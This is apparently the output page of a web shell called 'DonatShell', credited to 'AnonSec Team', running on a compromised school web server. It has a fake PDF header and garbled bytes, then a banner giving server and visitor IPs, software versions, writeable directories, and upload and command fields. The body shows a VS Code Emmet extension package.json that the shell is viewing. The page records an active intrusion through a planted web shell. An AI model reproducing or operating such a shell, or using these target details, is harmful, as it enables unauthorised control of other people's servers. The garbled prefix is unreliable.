%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Program Files/Microsoft VS Code/resources/app/extensions/emmet/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Program Files/Microsoft VS Code/resources/app/extensions/emmet/package.json
{
    "name": "emmet",
    "displayName": "Emmet",
    "description": "%description%",
    "version": "1.0.0",
    "publisher": "vscode",
    "engines": {
        "vscode": "^1.13.0"
    },
    "icon": "images/icon.png",
    "categories": [
        "Other"
    ],
    "repository": {
        "type": "git",
        "url": "https://github.com/Microsoft/vscode-emmet"
    },
    "activationEvents": [
        "*",
        "onCommand:emmet.expandAbbreviation",
        "onLanguage:html",
        "onLanguage:css",
        "onLanguage:scss",
        "onLanguage:less"
    ],
    "main": "./out/extension",
    "contributes": {
        "configuration": {
            "type": "object",
            "title": "Emmet",
            "properties": {
                "emmet.showExpandedAbbreviation": {
                    "type": [
                        "string"
                    ],
                    "enum": [
                        "never",
                        "always",
                        "inMarkupAndStylesheetFilesOnly"
                    ],
                    "default": "always",
                    "description": "%emmetShowExpandedAbbreviation%"
                },
                "emmet.showAbbreviationSuggestions": {
                    "type": "boolean",
                    "default": true,
                    "description": "%emmetShowAbbreviationSuggestions%"
                },
                "emmet.includeLanguages": {
                    "type": "object",
                    "default": {},
                    "description": "%emmetIncludeLanguages%"
                },
                "emmet.variables": {
                    "type": "object",
                    "properties": {
                        "lang": {
                            "type": "string",
                            "default": "en"
                        },
                        "charset": {
                            "type": "string",
                            "default": "UTF-8"
                        }
                    },
                    "default": {},
                    "description": "%emmetVariables%"
                },
                "emmet.syntaxProfiles": {
                    "type": "object",
                    "default": {},
                    "description": "%emmetSyntaxProfiles%"
                },
                "emmet.excludeLanguages": {
                    "type": "array",
                    "default": [
                        "markdown"
                    ],
                    "description": "%emmetExclude%"
                },
                "emmet.extensionsPath": {
                    "type": "string",
                    "default": null,
                    "description": "%emmetExtensionsPath%"
                },
                "emmet.triggerExpansionOnTab": {
                    "type": "boolean",
                    "default": false,
                    "description": "%emmetTriggerExpansionOnTab%"
                },
                "emmet.preferences": {
                    "type": "object",
                    "default": {},
                    "description": "%emmetPreferences%",
                    "properties": {
                        "css.intUnit": {
                            "type": "string",
                            "default": "px",
                            "description": "%emmetPreferencesIntUnit%"
                        },
                        "css.floatUnit": {
                            "type": "string",
                            "default": "em",
                            "description": "%emmetPreferencesFloatUnit%"
                        },
                        "css.propertyEnd": {
                            "type": "string",
                            "default": ";",
                            "description": "%emmetPreferencesCssAfter%"
                        },
                        "sass.propertyEnd": {
                            "type": "string",
                            "default": "",
                            "description": "%emmetPreferencesSassAfter%"
                        },
                        "stylus.propertyEnd": {
                            "type": "string",
                            "default": "",
                            "description": "%emmetPreferencesStylusAfter%"
                        },
                        "css.valueSeparator": {
                            "type": "string",
                            "default": ": ",
                            "description": "%emmetPreferencesCssBetween%"
                        },
                        "sass.valueSeparator": {
                            "type": "string",
                            "default": ": ",
                            "description": "%emmetPreferencesSassBetween%"
                        },
                        "stylus.valueSeparator": {
                            "type": "string",
                            "default": " ",
                            "description": "%emmetPreferencesStylusBetween%"
                        },
                        "bem.elementSeparator": {
                            "type": "string",
                            "default": "__",
                            "description": "%emmetPreferencesBemElementSeparator%"
                        },
                        "bem.modifierSeparator": {
                            "type": "string",
                            "default": "_",
                            "description": "%emmetPreferencesBemModifierSeparator%"
                        },
                        "filter.commentBefore": {
                            "type": "string",
                            "default": "",
                            "description": "%emmetPreferencesFilterCommentBefore%"
                        },
                        "filter.commentAfter": {
                            "type": "string",
                            "default": "\n<!-- /[#ID][.CLASS] -->",
                            "description": "%emmetPreferencesFilterCommentAfter%"
                        },
                        "filter.commentTrigger": {
                            "type": "array",
                            "default": [
                                "id",
                                "class"
                            ],
                            "description": "%emmetPreferencesFilterCommentTrigger%"
                        },
                        "format.noIndentTags": {
                            "type": "array",
                            "default": [
                                "html"
                            ],
                            "description": "%emmetPreferencesFormatNoIndentTags%"
                        },
                        "format.forceIndentationForTags": {
                            "type": "array",
                            "default": [
                                "body"
                            ],
                            "description": "%emmetPreferencesFormatForceIndentTags%"
                        },
                        "profile.allowCompactBoolean": {
                            "type": "boolean",
                            "default": false,
                            "description": "%emmetPreferencesAllowCompactBoolean%"
                        },
                        "css.webkitProperties": {
                            "type": "string",
                            "default": null,
                            "description": "%emmetPreferencesCssWebkitProperties%"
                        },
                        "css.mozProperties": {
                            "type": "string",
                            "default": null,
                            "description": "%emmetPreferencesCssMozProperties%"
                        },
                        "css.oProperties": {
                            "type": "string",
                            "default": null,
                            "description": "%emmetPreferencesCssOProperties%"
                        },
                        "css.msProperties": {
                            "type": "string",
                            "default": null,
                            "description": "%emmetPreferencesCssMsProperties%"
                        },
                        "css.fuzzySearchMinScore": {
                            "type": "number",
                            "default": 0.3,
                            "description": "%emmetPreferencesCssFuzzySearchMinScore%"
                        }
                    }
                },
                "emmet.showSuggestionsAsSnippets": {
                    "type": "boolean",
                    "default": false,
                    "description": "%emmetShowSuggestionsAsSnippets%"
                },
                "emmet.optimizeStylesheetParsing": {
                    "type": "boolean",
                    "default": true,
                    "description": "%emmetOptimizeStylesheetParsing%"
                }
            }
        },
        "commands": [
            {
                "command": "editor.emmet.action.wrapIndividualLinesWithAbbreviation",
                "title": "%command.wrapIndividualLinesWithAbbreviation%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.wrapWithAbbreviation",
                "title": "%command.wrapWithAbbreviation%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.removeTag",
                "title": "%command.removeTag%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.updateTag",
                "title": "%command.updateTag%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.matchTag",
                "title": "%command.matchTag%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.balanceIn",
                "title": "%command.balanceIn%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.balanceOut",
                "title": "%command.balanceOut%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.prevEditPoint",
                "title": "%command.prevEditPoint%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.nextEditPoint",
                "title": "%command.nextEditPoint%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.mergeLines",
                "title": "%command.mergeLines%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.selectPrevItem",
                "title": "%command.selectPrevItem%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.selectNextItem",
                "title": "%command.selectNextItem%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.splitJoinTag",
                "title": "%command.splitJoinTag%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.toggleComment",
                "title": "%command.toggleComment%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.evaluateMathExpression",
                "title": "%command.evaluateMathExpression%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.updateImageSize",
                "title": "%command.updateImageSize%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.incrementNumberByOneTenth",
                "title": "%command.incrementNumberByOneTenth%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.incrementNumberByOne",
                "title": "%command.incrementNumberByOne%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.incrementNumberByTen",
                "title": "%command.incrementNumberByTen%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.decrementNumberByOneTenth",
                "title": "%command.decrementNumberByOneTenth%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.decrementNumberByOne",
                "title": "%command.decrementNumberByOne%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.decrementNumberByTen",
                "title": "%command.decrementNumberByTen%",
                "category": "Emmet"
            },
            {
                "command": "editor.emmet.action.reflectCSSValue",
                "title": "%command.reflectCSSValue%",
                "category": "Emmet"
            }
        ],
        "menus": {
            "commandPalette": [
                {
                    "command": "editor.emmet.action.wrapIndividualLinesWithAbbreviation",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.wrapWithAbbreviation",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.removeTag",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.updateTag",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.matchTag",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.balanceIn",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.balanceOut",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.prevEditPoint",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.nextEditPoint",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.mergeLines",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.selectPrevItem",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.selectNextItem",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.splitJoinTag",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.toggleComment",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.evaluateMathExpression",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.updateImageSize",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.incrementNumberByOneTenth",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.incrementNumberByOne",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.incrementNumberByTen",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.decrementNumberByOneTenth",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.decrementNumberByOne",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.decrementNumberByTen",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                },
                {
                    "command": "editor.emmet.action.reflectCSSValue",
                    "when": "resourceScheme =~ /^untitled$|^file$/"
                }
            ]
        }
    },
    "scripts": {
        "compile": "gulp compile-extension:emmet"
    },
    "devDependencies": {
        "@types/node": "8.0.33",
        "mocha-junit-reporter": "^1.17.0",
        "mocha-multi-reporters": "^1.1.7",
        "vscode": "1.0.1"
    },
    "dependencies": {
        "@emmetio/css-parser": "ramya-rao-a/css-parser#vscode",
        "@emmetio/html-matcher": "^0.3.3",
        "@emmetio/math-expression": "^0.1.1",
        "image-size": "^0.5.2",
        "vscode-emmet-helper": "^1.2.10",
        "vscode-languageserver-types": "^3.5.0",
        "vscode-nls": "3.2.1"
    }
}

Anon7 - 2022
AnonSec Team